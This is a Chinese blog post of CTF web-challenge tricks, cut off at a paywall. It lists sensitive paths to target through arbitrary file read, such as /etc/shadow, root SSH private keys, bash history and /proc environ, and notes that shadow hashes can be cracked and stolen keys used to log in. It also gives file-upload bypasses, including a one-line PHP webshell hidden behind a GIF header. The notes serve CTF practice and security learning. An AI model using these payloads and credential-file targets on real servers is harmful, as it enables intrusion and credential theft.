一些CTF 做题的tricks

最新推荐文章于 2024-05-11 19:14:19 发布
最新推荐文章于 2024-05-11 19:14:19 发布
阅读量2.5k 收藏 18
点赞数 5
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36495104/article/details/107071361
版权

一些CTF 做题的tricks,东拼西凑放到这里,方便查找

任意文件读取路径汇总

任意文件读取漏洞和文件包含漏洞的表现相似,但是任意文件读取不能getshell,可以通过尝试读取相对路径的脚本文件,比如/read.php?file=index.php,如果可以读取到文件源码,说明是文件读取,如果不能读取到文件源码说明是文件包含。

下面收集的是一些常用的利用路径,应该够用了,以后也会及时更新,放在这便于以后的查阅和参考:

需要高权限读取的:

用户信息文件

/etc/passwd         # 用来记录每个拥有系统访问权的注册用户
/etc/shadow         # 密码信息,获取到后可用 John the Ripper 爆破
/root/.bash_history # 输入命令的历史记录,还有root外的其他用户
/root/.ssh/id_rsa   # 拿到私钥后可直接ssh登陆

### 系统信息文件

/etc/hosts          # 主机信息
/proc/version       # 内核版本
/proc/mounts        # 挂载的文件系统列表
/root/.bashrc       # 环境变量信息
/proc/net/route     # 路由表信息
/proc/net/arp       # arp表,可以获得内网其他机器的地址
/root/.viminfo      # vim 信息

程序运行信息

/proc/sched_debug   # 提供cpu上正在运行的进程信息,可以获得进程的pid号,可以配合后面需要pid的利用

/proc/net/tcp       # 活动连接的信息
/proc/net/udp
/proc/net/fib_trie  # 路由缓存

/proc/[PID]/cmdline # 进程状态[pid],可能包含有用的路径信息,可以为0000-9999,可以暴力枚举
/proc/[PID]/environ # 程序运行的环境变量信息,可以用来包含getshell
/proc/[PID]/cwd     # 当前进程的工作目录
/proc/[PID]/fd/[num]  # 访问file descriptors,某写情况可以读取到进程正在使用的文件,比如access.log

/proc/self/fd/[0-99]  # 可能获取到当前运行进程的文件

获取当前进程信息

fuzz字典

/proc/self/cmdline
/proc/self/stat
/proc/self/status
/proc/self/environ
/proc/verison
/proc/cmdline
/proc/self/cwd
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/proc/self/fd/16
/proc/self/fd/17
/proc/self/fd/18
/proc/self/fd/19
/proc/self/fd/20
/proc/self/fd/21
/proc/self/fd/22
/proc/self/fd/23
/proc/self/fd/24
/proc/self/fd/25
/proc/self/fd/26
/proc/self/fd/27
/proc/self/fd/28
/proc/self/fd/29
/proc/self/fd/30
/proc/self/fd/31
/proc/self/fd/32
/proc/self/fd/33
/proc/self/fd/34
/proc/self/fd/35
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/net/fib_trie
/proc/version

系统信息相关:

/etc/issue
/proc/version
/etc/redhat-release
/etc/debian_version
/etc/slackware_version
/etc/*version
/proc/cpuinfo

一些默认路径

SSH

/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/authorized_keys
/etc/ssh/sshd_config
/var/log/secure

Nginx

/etc/nginx/nginx.conf
/var/www/html
/usr/local/services/nginx-1.6.2/logs/access.log     #根据情况替换[version]
/usr/local/services/nginx-[version]/logs/error.log
/usr/local/services/nginx-[version]/nginx.conf
/usr/local/services/nginx-[version]/conf/nginx.conf
/usr/local/services/nginx-[version]/conf/proxy.conf
/usr/local/services/nginx-[version]/conf/extra/haolaiyao.conf

Apache

/home/httpd/
/home/httpd/www/

tomcat

/usr/local/services/apache-tomcat-8.0.23/logs       #根据情况替换[version]
/usr/local/services/apache-tomcat-[version]/logs/catalina.out

jetty

/usr/local/services/jetty-8.1.16/                   #根据情况替换[version]
/usr/local/services/jetty-8.1.16/logs/stderrout.log
/usr/local/services/jetty-8.1.16/etc/jetty.xml

resin

/usr/local/services/resin-4.0.44/                   #根据情况替换[version]
/usr/local/services/resin-4.0.44/conf/resin.xml
/usr/local/services/resin-4.0.44/conf/resin.properties

svn

/home/svnroot/

文件上传绕过

平常做ctf题的时候有很多上传的题目,有时候碰到了文件上传会不知道往哪里尝试绕过,所以在这里汇总平时遇到的一些绕过思路,以便以后卡克的时候速查。

Content-Type字段校验

Content-Type用于定义网络文件的类型和网页的编码,决定文件接收方将以什么形式、什么编码读取这个文件,绕过时只需更改Content-Type参数值即可。

常用Content-Type:

#图片文件
image/png   image/jpeg  image/gif

#文本文件
text/plain  text/xml    text/html

更多 -> HTTP Content-Type 对照表

文件头绕过

在木马内容基础上再加一些文件信息,比如文件的文件头。

其中.gif文件的文件头可以全部用ascii字符表示:

GIF89a <?php eval($_POST[1]); ?>

文件名绕过

后缀名绕过

后缀大小写绕过(linux下可以尝试)

.pHp .aSp

不常用后缀绕多

通过上传一些平时不怎么用的容易被人忽视的文件扩展名,来绕过一些验证。

.jsp  .jspa  .jspx  .jspw  .jspv  .jspf  .jtml      # jsp文
最低0.47元/天 解锁文章
0xCCCC9090
关注
  • 5
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CTF技巧集合 tricks
10-23
Phithon——CTF比赛总是输?你还差点Tricks!非常有用的资源
文件上传漏洞绕过方法和防御方法
Kris__zhang的博客
07-22 5394
文章目录上传流程概述客户端检测绕过检测(js检测)绕过方式1. 利用firebug禁用js2. 通过brup等代理工具服务端检测绕过(MIME检测)绕过方式通过brup等代理工具服务端检测绕过(扩展名检测)绕过方式文件名大小写绕过名单列表绕过特殊文件名绕过截断绕过.htaccess 文件攻击服务端检测绕过(文件内容检测)文件头检测文件加载检测解析攻击直接攻击配合攻击Apache 解析漏洞IIS 解析漏洞php-cgi 上传流程概述 一个文件以http协议上传的时候,将以post请求发送至web服务器。服务器
2024年网络安全最全CTFshow web入门——文件上传_ctfshow文件上传(1),网络安全事件分发机制及设计思路
最新发布
2401_84264727的博客
05-11 951
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。要修改的图片的路径,1.png是使用的文件,可以不存在。
文件上传 05 服务端检测绕过(文件内容检测)
kevinhanser
08-13 6270
本文记录文件上传学习过程,教程为 《Upload Attack Framework V1.0》 文件上传检测 客户端javascript 检测(通常为检测文件扩展名) 服务端MIME 类型检测(检测Content-Type 内容) 服务端目录路径检测(检测跟path 参数相关的内容)、 服务端文件扩展名检测(检测跟文件extension 相关的内容) 服务端文件内容检测(检测内容...
PHP弱类型之strcmp绕过
weixin_45082914的博客
08-18 3958
PHP弱类型之strcmp绕过 strcmp(string $str1,string $str2) strcmp是比较两个字符串,如果str1<str2 则返回<0 如果str1大于str2返回>0 如果两者相等 返回0。 strcmp比较的是字符串类型,如果强行传入其他类型参数,会出错。正是利用这点进行绕过。 flag[]=xxx 》》strcmp比较出错 》》返回null 》》null==0 ...
php image jpg不显示图片,新手提问。php 使用imagejpeg(图片) 显示图片 写一个显示一张图片写两个 为什么还是显示一张?...
weixin_39882623的博客
03-13 803
研究了下复制了代码
Android逆向CTF基础汇总
06-11
附件是八道Android基础逆向,基本都是CTF。平时网上基础的CTF目比较难找,全靠平时慢慢积累起来的,后面有其他过的CTF再贴出来分享给大家练手。
逆向ctf法总结.md
10-05
这是一份逆向ctf法的总结文档,给一个逆向CTF总体的介绍,便于新手有整体概念和针对性提升,适合有一定程度的CTF逆向选手。
crypto_repo:存储一些CTF加密脚本
05-16
crypto_repo 存储一些CTF加密脚本。
ctf拼图例-puzzle
04-13
关于puzzle例的原资源,搭配文章使用更配噢 https://editor.csdn.net/md/?articleId=124139016
上传验证绕过总结
Aurora的博客
03-26 5217
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 目录 0x01 客户端验证绕过(javascript 扩展名检测) 0x02 服务端验证绕过(http request 包检测) - Content-type (Mime type) 检测 0x03 服务端验证绕过(扩展名检测) - 黑名单
[CTF]ctfshow 文件上传
m0_63416413的博客
03-19 242
ctfshow的文件上传专,绕过严格的过滤,上传文件,为RCE(远程执行)的前置根基
我的渗透笔记之文件上传漏洞
xf555er的博客
03-02 307
一、突破MIME验证 原理:Mime是通过判断你的文件类型(不是后缀名)来决定是否允许你上传文件,只需抓包修改content_type,就可以绕过MIME验证了。 MIME代码:添加一个判断上传文件类型的代码 添加一个判断上传文件类型的代码 例子演示:上传一个脚本类型文件,看看提示是不是文件类型错误(也有可能写提示文件类型错误的代码) 抓包修改文件类型 这里是文件类型的参考 二、JS本地验证...
致力于打造最详细的Requests使用(不定期补充)
MrLevo520的博客
07-23 9436
Python 2.7 IDE Pycharm 5.0.3 Requests 2.10是时候静心下来好好研究一下Requests了 安装方法我这里只说在Pycharm+Anaconda2下怎么添加requests包,至于如何在Pycharm下安装Anaconda2,请看@zhusleep 和@木子岚的回答 然后安装大概是这样的,简单快捷,不用pip,不用easy install,anaconda
CTF-WEB入门学习笔记
m0_62945162的博客
06-13 585
CTF-WEB学习笔记分享
PHP函数漏洞集合【转】
weixin_34128411的博客
07-18 212
  1.弱类型比较   2.MD5 compare漏洞 PHP在处理哈希字符串时,如果利用”!=”或”==”来对哈希值进行比较,它把每一个以”0x”开头的哈希值都解释为科学计数法0的多少次方(为0),所以如果两个不同的密码经过哈希以后,其哈希值都是以”0e”开头的,那么php将会认为他们相同。  常见的payload有   0x01 md5(str)     QNKCDZO ...
CTF中常见的PHP函数漏洞
渗透、攻防、CTF、编程
07-04 2507
1.弱类型比较 2.MD5 compare漏洞 PHP在处理哈希字符串时,如果利用”!=”或”==”来对哈希值进行比较,它把每一个以”0x”开头的哈希值都解释为科学计数法0的多少次方(为0),所以如果两个不同的密码经过哈希以后,其哈希值都是以”0e”开头的,那么php将会认为他们相同。 常见的payload有 0x01 md5(str) QNKCDZO 240610708 s878926199a s155964671a s214587387a...
一些知名的CTF平台有哪些
07-13
以下是一些知名的CTF平台: 1. CTFtime:CTFtime是一个专门用于CTF比赛的平台,提供了全球范围内各种CTF比赛的信息、排名和报名等功能。你可以在这个平台上找到各种类型的CTF比赛。 2. Hack The Box:Hack The Box是一个在线平台,提供虚拟实验室和CTF挑战,供安全爱好者学习和提升技能。 3. PicoCTF:PicoCTF是一个面向初学者的CTF平台,提供各种级别的CTF挑战,旨在帮助新手学习和掌握网络安全技术。 4. DEFCON CTF:DEFCON CTF是DEFCON(世界上最大的黑客大会之一)上举办的CTF比赛,被认为是全球最具竞争力和高水平的CTF之一。 除了这些知名平台之外,还有许多其他组织和团队会举办自己的CTF比赛。你可以通过关注CTFtime等平台或者参与相关社群来获得更多关于七月份的比赛信息。希望对你有所帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值